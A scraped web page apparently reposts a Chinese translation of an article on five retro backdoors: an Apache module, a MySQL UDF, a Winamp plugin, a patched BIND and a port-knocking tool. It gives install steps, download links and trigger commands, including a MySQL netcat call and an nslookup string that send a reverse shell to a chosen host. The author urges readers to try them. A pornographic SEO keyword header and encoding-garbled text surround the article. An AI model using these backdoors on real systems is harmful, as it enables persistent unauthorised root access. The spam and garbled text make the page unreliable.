日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案
老式后門(mén)之美:五種復(fù)古遠(yuǎn)程控制工具(含下載)

目前,高級(jí)的rootkit技術(shù)可以幫助你在滲透中拿到一個(gè)shell后進(jìn)行持久性控制。此外,還有供應(yīng)商故意提供了一些植入后門(mén),但那就是截然不同的故事了。盡管各式花樣翻新的技術(shù)與代碼層出不窮,可你還記得曾經(jīng)用過(guò)的那些后門(mén)嗎?

本文介紹了5種遠(yuǎn)程控制工具(Remote Administration Tools)RAT ,又稱“后門(mén)”,這完全是根據(jù)作者個(gè)人喜好挑選的。這是我進(jìn)行合法滲透測(cè)試時(shí)所使用的工具,它們對(duì)于驗(yàn)證滲透的持久性與測(cè)量防御手段的有效性提供了重要的幫助。

1.mod_rootme——Apache模塊后門(mén)(2004)

“mod_rootme是一個(gè)非??岬哪K,它可以在Apache中安裝一個(gè)后門(mén),你只需要進(jìn)行一個(gè)簡(jiǎn)單的GET請(qǐng)求,就可以拿到一個(gè)root權(quán)限的shell,并且在系統(tǒng)中沒(méi)有任何日志記錄?!?/p>

作為***的工具之一,你只需要執(zhí)行一個(gè)簡(jiǎn)單的make命令來(lái)編譯共享庫(kù),將它復(fù)制到模塊目錄,在httpd.conf中寫(xiě)入入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”,然后使用‘a(chǎn)pachetl stop;apachectl start’重啟httpd后臺(tái)進(jìn)程。之后,通過(guò)“GET root”命令你就得到了一個(gè)root權(quán)限的shell。

下載:https://packetstormsecurity.com/files/33652/mod_rootme-0.3.tgz.html

2.raptor_winudf.sql —— MySQL UDF后門(mén)(2004-2006)

“這是一個(gè)基于UDF(用戶定義函數(shù))機(jī)制的MySQL后門(mén)工具??梢杂盟鼇?lái)產(chǎn)生一個(gè)反彈shell(netcat UDF監(jiān)聽(tīng)80端口)或者執(zhí)行一條系統(tǒng)命令(exec UDF)。”

對(duì)于這個(gè)后門(mén),你可以使用一個(gè)簡(jiǎn)單的命令‘#mysql –h x.x.x.x < raptor_winudf.sql’將后門(mén)作為一個(gè)用戶定義函數(shù)注入到MySQL中。這樣你便可以從MySQL shell執(zhí)行‘mysql > select exec('ipconfig > c:\\out.txt');’命令。

這個(gè)反彈shell實(shí)現(xiàn)了一個(gè)有趣的功能,可以使用命令‘mysql> select netcat('y.y.y.y');’來(lái)調(diào)用,之后就會(huì)發(fā)送一個(gè)交互式shell在指定的主機(jī)(y.y.y.y)的80端口上。

下載 (Win32): http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

下載 (Linux): http://www.0xdeadbeef.info/exploits/raptor_udf2.c

截圖來(lái)源:infamoussyn

3. get_wbkdr.dll插件——Winamp播放器后門(mén)(2006)

“wbkdr是非常著名的高保真音樂(lè)播放器軟件Winamp后門(mén)的一個(gè)POC,它利用了插件接口,在24501端口中調(diào)用cmd.exe?!?/p>

下載:https://packetstormsecurity.com/files/53268/wbkdr.zip.html

4.BIND反彈shell后門(mén)(2005)

BIND是世界上***的DNS服務(wù)器軟件之一。這個(gè)后門(mén)使用了BIND未發(fā)布的補(bǔ)丁,是我的一個(gè)來(lái)自阿根廷的朋友開(kāi)發(fā)的?;旧?,需要你以root用戶的身份來(lái)打補(bǔ)丁、編譯以及運(yùn)行服務(wù)。一旦運(yùn)行,用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ 發(fā)送一個(gè)DNS請(qǐng)求,將會(huì)在主機(jī)x.x.x.x的給定端口上觸發(fā)一個(gè)反彈shell。

5.Knock-out—— 基于端口敲門(mén)(port-knocking)的后門(mén)

這是我使用數(shù)據(jù)包嗅探庫(kù)libpcap(服務(wù)器)和數(shù)據(jù)包構(gòu)造庫(kù)libnet(客戶端)制作的后門(mén)。我運(yùn)用了端口敲門(mén)技術(shù),它可以是一個(gè)綁定端口的shell也可以是一個(gè)反彈型的shell。服務(wù)器與客戶端使用相同的配置文件來(lái)決定使用哪些端口以及發(fā)送每個(gè)網(wǎng)絡(luò)包時(shí)間所需要的時(shí)間差。Knock-out支持TCP和UDP,并且最近在Linux主機(jī)中仍然可以工作(測(cè)試系統(tǒng)Ubuntu Server 14.04)。

下載:https://packetstormsecurity.com/files/52834/knock-out.tar.gz.html

作者寄語(yǔ)

這些后門(mén)至今仍然有效,或許你可以嘗試一下。同時(shí),我鼓勵(lì)大家與我們分享你見(jiàn)過(guò)的有趣的后門(mén)、你喜歡的后門(mén)、你用過(guò)的最特別的后門(mén)以及你所鐘愛(ài)的后門(mén)。別忘了在Twitter上使用#oldschoolbackdoors(老式后門(mén))標(biāo)簽!


新聞名稱:老式后門(mén)之美:五種復(fù)古遠(yuǎn)程控制工具(含下載)
瀏覽路徑:http://www.dlmjj.cn/article/cooisgc.html